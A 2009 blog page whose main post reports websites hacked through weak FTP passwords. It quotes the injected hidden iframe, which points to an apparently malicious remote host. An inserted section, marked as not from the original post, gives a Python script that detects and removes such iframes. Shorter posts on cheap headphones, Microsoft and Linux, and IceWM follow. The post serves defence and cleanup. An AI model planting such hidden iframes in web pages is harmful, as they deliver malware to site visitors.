Brute Force FTP Password Hacking On The Rise
September 15, 2009 by Marko
I know of at least six websites that I provide support for that have had malicious code embedded into their web pages in the last few months. The common entry point for the hackers in all of these cases has been FTP login. Each site had simple username/password combinations and hence was fairly easy to get into. It seems that the hackers are using an automated script to insert their code, as I’ve found that every single file whose filename contains the words “index” or “default” gets modified, regardless of the extension (whether .htm, .html, .php, .asp, etc.) and whether or not the file is actually even linked to.
Commonly, an invisible iframe like the following gets inserted after the <body> tag or at the very end of the file.
<iframe src="http://3e0.ru:8080/index.php" width=160 height=188 style="visibility: hidden"></iframe>
The file on the remote site then delivers the real payload. Sometimes JavaScript code is inserted instead of an iframe. Again, the JavaScript code loads an external JavaScript file which contains the real payload.
If your clients haven’t made recent backups, you will need to either remove the offending code snippets manually or create a script to do it for you (if many files are affected). If you leave the code in place or don’t remove it quickly enough, the site will end up on Google’s blacklist. Browsers like Firefox will then not show the site and instead put up a big red warning page. IE will continue to show the hacked pages and is probably the target of the malicious code in the first place. If your site does get blacklisted, you will need to request a re-scan from Google.
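An added example (not from the original post) of the cleanup script suggested above: it finds hidden iframes with an external src in files whose names contain “index” or “default”, reports them, and rewrites the files only when a backup directory is given. The function names, the display:none variant and the placeholder host in the sample are assumptions.

```python
import re
import shutil
from pathlib import Path

# An <iframe> with an absolute http(s) src that is hidden via CSS, as in the
# tag shown above. display:none is an added assumption (a common variant).
HIDDEN_IFRAME = re.compile(
    r"<iframe\b(?=[^>]*\bsrc\s*=\s*[\"']?https?://)"
    r"(?=[^>]*(?:visibility\s*:\s*hidden|display\s*:\s*none))"
    r"[^>]*>\s*</iframe>",
    re.IGNORECASE,
)
SRC = re.compile(r"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)

# Constructed sample modelled on the injected tag above (placeholder host).
SAMPLE = ('<html><body><iframe src="http://injected.example:8080/index.php" '
          'width=160 height=188 style="visibility: hidden"></iframe>'
          '<h1>Home</h1><iframe src="/map.html"></iframe></body></html>')

def is_target(path):
    # The post reports that files named *index* or *default* get modified.
    name = path.name.lower()
    return "index" in name or "default" in name

def clean_html(text):
    """Return (cleaned_text, [src URLs of the hidden iframes removed])."""
    found = [SRC.search(m.group(0)).group(1) for m in HIDDEN_IFRAME.finditer(text)]
    return HIDDEN_IFRAME.sub("", text), found

def clean_tree(root, backup_dir=None):
    """Report hits under root; rewrite files only if backup_dir is given."""
    root, report = Path(root), {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or not is_target(path):
            continue
        # latin-1 round-trips every byte, so legacy encodings survive a rewrite
        text = path.read_bytes().decode("latin-1")
        cleaned, found = clean_html(text)
        if not found:
            continue
        rel = path.relative_to(root)
        report[rel.as_posix()] = found
        if backup_dir is not None:  # keep the original outside the web root
            saved = Path(backup_dir) / rel
            saved.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(path, saved)
            path.write_bytes(cleaned.encode("latin-1"))
    return report
```

Run `clean_tree(webroot)` first to review the report, then again with a backup directory to apply the change. The JavaScript variant mentioned above is not covered by this pattern.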
The easiest way to avoid this hack is just to make sure all your (and your clients’) passwords are not overly simple. The password “password” is not a good choice while “fuMrHack8” is.
Mono “Hi-fi” Wireless Headphones
September 14, 2009 by Marko
This past weekend I was searching for wireless headphones to replace the ones I use at work that are worn out. I remember getting my current ones from some grocery store for about $25 (about 5 years ago?) and was hoping to find something similar. Would like them small, lightweight and comfortable enough for wearing hours at a time during work. I checked a cheap local store, XSCARGO, and was surprised to find some for only $10. The box said it had “Hi-Fi”, “Super Bass” and even included an FM radio receiver built-in. Good deal, I thought… until I got them home and tested them. Even though the 3.5mm cabling that came with it had the obvious 3 sections, meaning that it’s stereo, the headphones themselves ended up only being mono. Same for the FM radio. I had another look at the packaging and sure enough the word “Stereo” does NOT appear anywhere on it. And I guess they can still call them “Hi-Fi” because that is a hazy term anyway. I went to 2 other cheap stores, Factory Direct and KW Surplus, and found different no-name Chinese-manufactured wireless headphones in the $10 range that indicated “Hi-Fi” but not “Stereo”. So, I have come to the conclusion that the makers of bulk crap electronics have realized that most people (at least the ones in the market for cheap headphones) can’t tell the difference between what stereo and mono sound like when played in both ears. The cheapest ones I have found to date that are both wireless and stereo (I think) are at Walmart for $30 but they are huge. Canadian Tire and The Source (RadioShack) have them starting at $80. Best Buy’s cheapest pair was $120. eBay is full of the cheap mono headphones and no real deals to be found on proper ones. I will keep looking.
Microsoft Hit List
September 13, 2009 by Marko
Microsoft’s latest checklist
Date: 2007-06-14 (transferred from old blog)
I’ve been using Linux on my main desktop computer for many years now and find the recent deals Microsoft is making with major Linux distributions to be very troubling. I use ArchLinux, which is surely not even on Microsoft’s radar, but still, anything that happens to the more popular Linux distros can hurt us all.
Microsoft’s checklist…
[x] SuSE (failing, easy target)
[x] Xandros (failing, easy target)
[x] Linspire/Freespire (failing, easy target)
[ ] Mandriva (failing, easy target)
[ ] Redhat/Fedora (they have money, might be a hard one to crack, concentrate on patent lawsuits)
[ ] Ubuntu/Kubuntu/Xubuntu (they have community, might be a hard one to crack, concentrate on patent lawsuits)
[ ] Slackware (who cares, only hardcore nerds use this, ignore for now)
[ ] Gentoo (who cares, only hardcore nerds use this, ignore for now)
[ ] Debian (they have militant community, might be impossible to crack, ignore for now)
For more information, check out these Slashdot articles…
Linspire Signs Patent Pact With MS
Windows In A Linux World
September 13, 2009 by Marko
Windows In A Linux World
Date: 2005-04-04 (transferred from old blog)
I went to our local Linux User Group meeting tonight and the guest speaker was a Microsoft representative talking about Unix Services on Windows. Basically, Microsoft is pretending that they are involved in the open-source movement by making tools that allow you to run Linux virtual machines under Windows and allowing a select few corporations to have a peek at some of their source code… but everything was restricted and geared toward having Windows control it all. Everything is made with the sense that the user will want to migrate completely to Windows eventually. He handed out 10 free copies of Windows 2003 Server. “Hey kid, first one’s free!” (thanks, but no thanks)
IceWM
September 13, 2009 by Marko
IceWM screenshots
Date: 2005-01-02 (transferred from old blog)
I have been using Linux on my main desktop computer for 4 years now. Seen here running with the IceWM window manager. I recently switched from Mandrake Linux to Arch Linux and thought I’d put up a newer screenshot.